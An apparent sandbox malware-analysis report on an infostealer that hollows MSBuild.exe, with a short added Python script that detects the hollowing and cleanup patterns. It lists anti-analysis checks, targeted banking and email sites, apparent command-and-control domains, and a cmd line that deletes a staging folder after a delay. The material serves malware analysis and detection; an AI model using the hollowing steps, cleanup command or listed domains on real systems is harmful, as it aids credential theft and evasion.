Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BFCGDA.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: BFCGDA.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: BFCGDA.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: BFCGDA.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: BFCGDA.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: BFCGDA.4.dr Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: BFCGDA.4.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: BFCGDA.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: BFCGDA.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BFCGDA.4.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BFCGDA.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: BFCGDA.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: BFCGDA.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: BFCGDA.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BFCGDA.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: BFCGDA.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BFCGDA.4.dr Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\ProgramData\CBFCFBFBFB.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006120AD VirtualProtect,LdrInitializeThunk,GetConsoleWindow,CloseHandle,SetCursorPos, 0_2_006120AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0061B5E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00418950
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061208F mov edi, dword ptr fs:[00000030h] 0_2_0061208F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00639362 mov eax, dword ptr fs:[00000030h] 0_2_00639362
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0063937A mov eax, dword ptr fs:[00000030h] 0_2_0063937A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00639385 mov eax, dword ptr fs:[00000030h] 0_2_00639385
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00650472 mov eax, dword ptr fs:[00000030h] 0_2_00650472
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00627EE8 mov eax, dword ptr fs:[00000030h] 0_2_00627EE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061EE9C mov ecx, dword ptr fs:[00000030h] 0_2_0061EE9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004014AD mov eax, dword ptr fs:[00000030h] 4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040148A mov eax, dword ptr fs:[00000030h] 4_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004014A2 mov eax, dword ptr fs:[00000030h] 4_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00418599 mov eax, dword ptr fs:[00000030h] 4_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041859A mov eax, dword ptr fs:[00000030h] 4_2_0041859A
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00AF208F mov edi, dword ptr fs:[00000030h] 13_2_00AF208F
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00AFEE9C mov ecx, dword ptr fs:[00000030h] 13_2_00AFEE9C
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00B07EE8 mov eax, dword ptr fs:[00000030h] 13_2_00B07EE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0062A4E7 GetProcessHeap, 0_2_0062A4E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006174A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_006174A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0061B5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0061B5E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006177C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_006177C5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00617952 SetUnhandledExceptionFilter, 0_2_00617952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0042762E SetUnhandledExceptionFilter, 4_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_6C8BB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C8BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6C8BB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6CA6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6CA6AC62
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00AF74A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00AF74A0
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00AFB5E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00AFB5E6
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00AF77C5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00AF77C5
Source: C:\ProgramData\CBFCFBFBFB.exe Code function: 13_2_00AF7952 SetUnhandledExceptionFilter, 13_2_00AF7952

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\CBFCFBFBFB.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 4_2_0040F54A
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: CBFCFBFBFB.exe String found in binary or memory: questionsmw.stor
Source: CBFCFBFBFB.exe String found in binary or memory: soldiefieop.site
Source: CBFCFBFBFB.exe String found in binary or memory: mysterisop.site
Source: CBFCFBFBFB.exe String found in binary or memory: absorptioniw.site
Source: CBFCFBFBFB.exe String found in binary or memory: treatynreit.site
Source: CBFCFBFBFB.exe String found in binary or memory: snarlypagowo.site
Source: CBFCFBFBFB.exe String found in binary or memory: abnomalrkmu.site
Source: CBFCFBFBFB.exe String found in binary or memory: chorusarorp.site
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 4_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 4_2_0041257F
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 882008
Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000
Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000
Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000
Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11BF008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit
Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
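The lines above record the full hollowing chain against MSBuild.exe: the injector creates the process, reads its context and PEB (GetThreadContext, ReadProcessMemory) to locate the image base, allocates an execute/read/write region at 0x400000 with VirtualAllocEx, writes a PE starting with the 4D5A ("MZ") header via several WriteProcessMemory calls, and redirects the main thread with SetThreadContext before ResumeThread. Afterwards the hollowed MSBuild.exe spawns cmd.exe with `timeout /t 10 & rd /s /q` to delete its staging directory. The Python below is an added example, not part of the Joe Sandbox report: it parses behaviour lines in the report's `Source: <process> <event>: <target> ...` layout (the regexes are inferred from the lines shown here, not a documented export format; the trailing "Jump to behavior" link label that the HTML export appends is stripped) and flags each injector/target pair that shows all three of process creation, an RWX allocation and an MZ-prefixed write, plus the delayed self-cleanup command. The sample lines are copied from this report.

```python
"""Correlate sandbox behaviour lines into process-hollowing and cleanup findings.

Added example, not from the report.  The line layout handled here is read off
the report's own lines and is an assumption, not a documented export format.
"""
import re
from collections import defaultdict

# Constructed input: behaviour lines as exported from the report, including the
# "Jump to behavior" link label the HTML export appends to each line.
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior',
    r'Source: C:\ProgramData\CBFCFBFBFB.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write Jump to behavior',
    r'Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior',
    r'Source: C:\ProgramData\CBFCFBFBFB.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior',
    r'Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior',
    r'Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior',
    r'Source: C:\ProgramData\CBFCFBFBFB.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\ProgramData\CBFCFBFBFB.exe "C:\ProgramData\CBFCFBFBFB.exe" Jump to behavior',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJDBAEHIJKJK" & exit Jump to behavior',
]

LINK_LABEL = re.compile(r"\s*Jump to behavior\s*$")
ALLOC_RE = re.compile(r"^Source: (?P<src>.+?) Memory allocated: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<protect>.+)$")
WRITE_RE = re.compile(r"^Source: (?P<src>.+?) Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<prefix>[0-9A-Fa-f]+))?$")
CREATE_RE = re.compile(r'^Source: (?P<src>.+?) Process created: (?P<dst>.+?) (?P<cmdline>".*)$')
# Delayed deletion of a staging folder: "timeout /t N & rd /s /q <dir>".
CLEANUP_RE = re.compile(r"timeout\s+/t\s+\d+\s*&\s*rd\s+/s\s+/q", re.IGNORECASE)


def parse_events(lines):
    """Turn exported behaviour lines into event dicts; unrecognised lines are skipped."""
    events = []
    for raw in lines:
        line = LINK_LABEL.sub("", raw.strip())
        for kind, pattern in (("alloc", ALLOC_RE), ("write", WRITE_RE), ("create", CREATE_RE)):
            m = pattern.match(line)
            if m:
                events.append({"kind": kind, **m.groupdict()})
                break
    return events


def find_hollowing(events):
    """(injector, target) pairs with process creation + RWX allocation + MZ write."""
    state = defaultdict(lambda: {"created": False, "rwx": False, "mz": False})
    for ev in events:
        key = (ev["src"], ev["dst"])
        if ev["kind"] == "create":
            state[key]["created"] = True
        elif ev["kind"] == "alloc":
            protect = ev["protect"].lower()
            if "execute" in protect and "write" in protect:
                state[key]["rwx"] = True
        elif ev["kind"] == "write":
            # 4D5A is the "MZ" DOS header: a whole PE image is being planted.
            if (ev.get("prefix") or "").upper().startswith("4D5A"):
                state[key]["mz"] = True
    return sorted(key for key, flags in state.items() if all(flags.values()))


def find_cleanup(events):
    """(parent, command line) for child processes that delete a directory after a delay."""
    return [(ev["src"], ev["cmdline"]) for ev in events
            if ev["kind"] == "create" and CLEANUP_RE.search(ev["cmdline"])]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LINES)
    for injector, target in find_hollowing(evs):
        print(f"process hollowing: {injector} -> {target}")
    for parent, cmd in find_cleanup(evs):
        print(f"delayed cleanup from {parent}: {cmd}")
```

Both file.exe and the dropped CBFCFBFBFB.exe hollow a fresh MSBuild.exe, while MSBuild.exe's own spawning of CBFCFBFBFB.exe is a plain process creation with no remote memory writes and is correctly not flagged. The same three-way correlation can be driven from EDR telemetry that records remote allocations and writes.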
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00639076 cpuid 0_2_00639076
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0062A0B0
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_0062A1B6
Source: C:\Users\user\Desktop\file.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free, 0_2_0065D2BB
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0062A285
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_0065F44E
Source: C:\Users\user\Desktop\file.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_00629921
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free, 0_2_00661928
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00621A42
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free, 0_2_00662A18
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00629BC3
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free, 0_2_00661C46
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00629C0E
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_00629CA9
Source: C:\Users\user\Desktop\file.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_00660C9C
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00629D34
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00621EEC
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_00629F87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 4_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 4_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 4_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 4_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 4_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 4_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 4_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 4_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 4_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: EnumSystemLocalesA, 4_2_0042B556
